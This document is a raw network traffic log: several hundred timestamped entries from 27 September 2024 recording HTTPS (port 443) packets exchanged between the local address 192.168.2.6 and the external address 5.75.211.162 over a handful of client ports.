Sep 27, 2024 00:28:40.581995964 CEST	443	57884	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:40.584033012 CEST	57884	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:40.584037066 CEST	443	57884	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.024658918 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.024697065 CEST	443	57885	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.024777889 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.025036097 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.025041103 CEST	443	57885	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.479160070 CEST	443	57884	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.479234934 CEST	57884	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.479247093 CEST	443	57884	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.479262114 CEST	443	57884	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.479290962 CEST	57884	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.479327917 CEST	57884	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.482718945 CEST	57884	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.482733965 CEST	443	57884	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.675493002 CEST	443	57885	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.676249027 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.676249027 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.676279068 CEST	443	57885	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:41.681183100 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:41.681190968 CEST	443	57885	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:42.143191099 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.143241882 CEST	443	57886	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:42.143827915 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.143829107 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.143857956 CEST	443	57886	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:42.530723095 CEST	443	57885	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:42.530806065 CEST	443	57885	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:42.530877113 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.531044960 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.531965971 CEST	57885	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.531995058 CEST	443	57885	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:42.812724113 CEST	443	57886	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:42.813029051 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.813502073 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.813513994 CEST	443	57886	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:42.816215992 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:42.816231012 CEST	443	57886	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:43.224940062 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:43.224980116 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:43.225416899 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:43.225416899 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:43.225445986 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:43.715507030 CEST	443	57886	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:43.715593100 CEST	443	57886	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:43.715622902 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:43.715650082 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:43.716670036 CEST	57886	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:43.716700077 CEST	443	57886	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:43.908602953 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:43.908857107 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.026761055 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.026792049 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.028847933 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.028856039 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.350871086 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.350893021 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.350908995 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.350930929 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.350945950 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.350960016 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.350964069 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.351017952 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.351017952 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.385880947 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.385912895 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.386049986 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.386064053 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.386156082 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.447927952 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.447949886 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.448010921 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.448023081 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.448066950 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.477720976 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.477750063 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.478208065 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.478224039 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.478297949 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.516765118 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.516791105 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.516966105 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.516977072 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.517035961 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.549602032 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.549634933 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.549737930 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.549762011 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.549820900 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.568149090 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.568173885 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.568270922 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.568288088 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.568299055 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.568356991 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.585858107 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.585885048 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.585953951 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.585964918 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.586007118 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.586095095 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.603521109 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.603540897 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.603679895 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.603703976 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.603749037 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.618299961 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.618330956 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.618488073 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.618515968 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.618616104 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.635443926 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.635467052 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.635622978 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.635653019 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.635724068 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.649322987 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.649346113 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.649483919 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.649513960 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.649563074 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.664593935 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.664622068 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.664767027 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.664788961 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.664845943 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.676862955 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.676883936 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.677021980 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.677031994 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.677135944 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.685781956 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.685802937 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.685971022 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.685981035 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.686049938 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.695781946 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.695807934 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.695892096 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.695908070 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.695955992 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.705018997 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.705040932 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.705215931 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.705246925 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.705302954 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.712121010 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.712146997 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.712269068 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.712279081 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.712445021 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.722215891 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.722244024 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.722338915 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.722349882 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.722394943 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.733443975 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.733469963 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.733844995 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.733855963 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.734987974 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.746854067 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.746881008 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.747003078 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.747033119 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.747143030 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.760283947 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.760308027 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.760484934 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.760514021 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.760571957 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.770874023 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.770900011 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.771012068 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.771042109 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.771156073 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.779301882 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.779323101 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.779431105 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.779455900 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.779562950 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.788976908 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.788997889 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.789089918 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.789104939 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.789210081 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.796204090 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.796226025 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.796305895 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.796315908 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.796386957 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.804709911 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.804729939 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.805310965 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.805321932 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.805458069 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.815061092 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.815080881 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.815196991 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.815217972 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.815260887 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.833614111 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.833636045 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.833749056 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.833769083 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.833825111 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.847281933 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.847301006 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.847409010 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.847420931 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.847489119 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.858099937 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.858124018 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.858244896 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.858268976 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.858335018 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.866561890 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.866592884 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.866674900 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.866693974 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.866727114 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.866727114 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.876441956 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.876477003 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.876564980 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.876581907 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.876617908 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.876630068 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.883349895 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.883374929 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.883480072 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.883497953 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.883549929 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.891915083 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.891946077 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.891993999 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.892008066 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.892026901 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.892118931 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.901746035 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.901763916 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.901995897 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.902004957 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.902169943 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.920717001 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.920743942 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.920878887 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.920892954 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.920955896 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.936053038 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.936084032 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.936451912 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.936467886 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.936620951 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.947676897 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.947698116 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.947783947 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.947796106 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.947856903 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.953334093 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.953351021 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.953803062 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.953811884 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.953881025 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.975310087 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.975338936 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.975411892 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.975411892 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.975426912 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.975481033 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.980165958 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.980216026 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.980238914 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.980254889 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.980266094 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.980307102 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.980525017 CEST	57887	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.980546951 CEST	443	57887	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.981646061 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.981677055 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:44.981755018 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.982074022 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:44.982088089 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:45.640918970 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:45.641020060 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:45.641671896 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:45.641680956 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:45.644279003 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:45.644283056 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.104849100 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.104873896 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.104895115 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.105020046 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.105045080 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.105160952 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.105598927 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.135498047 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.135521889 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.135588884 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.135602951 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.135721922 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.202589989 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.202614069 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.202765942 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.202775002 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.202989101 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.234462023 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.234488964 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.234663963 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.234678984 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.234754086 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.266884089 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.266913891 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.267038107 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.267044067 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.267100096 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.298508883 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.298537016 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.298798084 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.298804998 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.298860073 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.318598986 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.318623066 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.318835020 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.318840027 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.318907022 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.336283922 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.336306095 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.336425066 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.336429119 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.336492062 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.353857994 CEST	443	57888	5.75.211.162	192.168.2.6
